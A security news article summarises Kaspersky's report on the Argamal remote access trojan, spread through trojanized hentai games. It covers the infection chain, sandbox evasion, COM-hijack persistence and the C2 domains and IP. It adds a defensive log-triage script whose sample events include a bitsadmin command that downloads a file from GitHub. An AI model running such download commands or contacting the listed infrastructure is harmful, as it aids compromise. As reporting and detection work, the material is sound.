Argamal RAT Targets Hentai Gamers via Trojanized Games, Kaspersky Reports
- Hentai Game Malware: Kaspersky discovered the Argamal malware family in April 2026, targeting players of hentai games with a full-featured RAT.
- Hundreds Infected: Victims were mainly located in Russia, Brazil, Germany, and Vietnam, with hundreds of individuals compromised.
- RAT Capabilities: The RAT can execute commands, take screenshots, manage files, and control input devices.
A new malware campaign targets players of hentai games with a remote access trojan (RAT). In April 2026, Kaspersky researchers discovered and named the malware family Argamal. Once launched, infected games install a previously unknown malicious implant. After a few days, the implant downloads and executes a Trojan, resulting in full system compromise and broad remote control capabilities.
Distribution via PixelDrain and AniRena
Trojanized games were delivered through dedicated websites whose download links redirected to PixelDrain, as well as via torrent trackers, including AniRena, according to a SecureList by Kaspersky report.
The downloaded archive contained legitimate game files alongside a modified FFmpeg DLL and a file named natives2_blob.bin that executes a Base64-encoded PowerShell script upon loading.
The first stage checks for the presence of Sandboxie and Procmon64 to detect controlled environments. If clear, it sets persistence and creates a scheduled task that executes three days later.
The second stage downloads an encrypted payload from GitHub using bitsadmin.exe, decrypts it with AES-CBC, and establishes persistence through COM hijacking tied to the Windows Color System Calibration Loader.
The resulting payload is a RAT capable of fully controlling the infected machine, including executing commands, taking screenshots, managing files, and controlling input devices.
RAT Targets and Attribution
The C2 infrastructure uses the domains asper1.freeddns.org, Winst0.kozow.com, and country1.ignorelist.com, all pointing to IP 186.158.223.35. Hundreds of individuals were infected, with most victims in Russia, Brazil, Germany, and Vietnam.
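For defenders, the network indicators above and the bitsadmin.exe download from GitHub described in the second stage can be turned into a simple log triage. The following is an added example, not code from the Kaspersky report; the event field names, the GitHub host pattern, and the sample events are assumptions constructed for illustration.

```python
import re

# Indicators copied from the article text, normalised to lower case.
C2_DOMAINS = {"asper1.freeddns.org", "winst0.kozow.com", "country1.ignorelist.com"}
C2_IP = "186.158.223.35"
# Assumption: hosts a BITS job would reference when fetching from GitHub.
GITHUB_RE = re.compile(r"https?://([\w.-]+\.)?(github\.com|githubusercontent\.com)/", re.I)

def norm_host(name):
    """DNS names are case-insensitive and may carry a trailing root dot."""
    return name.strip().rstrip(".").lower()

def check_dns(event):
    """Flag a DNS event whose query or answer matches the reported C2."""
    host = norm_host(event.get("query", ""))
    # Match the exact names (and their subdomains), never the parent zone.
    for domain in C2_DOMAINS:
        if host == domain or host.endswith("." + domain):
            return f"dns query for reported C2 domain {domain}"
    if C2_IP in event.get("answers", []):
        return f"dns answer resolves to reported C2 IP {C2_IP}"
    return None

def check_process(event):
    """Flag bitsadmin.exe fetching from GitHub, as the second stage does."""
    image = event.get("image", "").replace("\\", "/").rsplit("/", 1)[-1].lower()
    if image == "bitsadmin.exe" and GITHUB_RE.search(event.get("cmdline", "")):
        return "bitsadmin.exe download from GitHub"
    return None

def triage(events):
    """Return (host, reason) for every event that matches a check."""
    checks = {"dns": check_dns, "process": check_process}
    results = ((ev.get("host"), checks.get(ev.get("type"), lambda e: None)(ev)) for ev in events)
    return [(host, reason) for host, reason in results if reason]

# Constructed sample events (not real telemetry); field names are hypothetical.
SAMPLE = [
    {"type": "dns", "host": "pc-01", "query": "WINST0.kozow.com.", "answers": ["186.158.223.35"]},
    {"type": "dns", "host": "pc-02", "query": "example.org", "answers": ["186.158.223.35"]},
    {"type": "dns", "host": "pc-03", "query": "kozow.com", "answers": ["192.0.2.10"]},
    {"type": "process", "host": "pc-01", "image": "C:\\Windows\\System32\\bitsadmin.exe",
     "cmdline": "bitsadmin /transfer job https://raw.githubusercontent.com/PLACEHOLDER/blob.bin C:\\Users\\Public\\blob.bin"},
    {"type": "process", "host": "pc-04", "image": "C:\\Windows\\System32\\bitsadmin.exe", "cmdline": "bitsadmin /list"},
]

if __name__ == "__main__":
    for host, reason in triage(SAMPLE):
        print(host, reason)
```

A bitsadmin.exe hit alone is a lead rather than a verdict, since the tool has legitimate uses; it carries more weight when the same host also shows one of the DNS matches.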
Kaspersky assesses with medium confidence that the developer of the downloader chain speaks Spanish, based on variable names, code comments, and infrastructure data.
A March report revealed that XWorm RAT dominates the Malware-as-a-Service (MaaS) landscape with a 174% increase in detections. A cross-platform RAT was deployed in the Axios supply chain attack that occurred the same month.









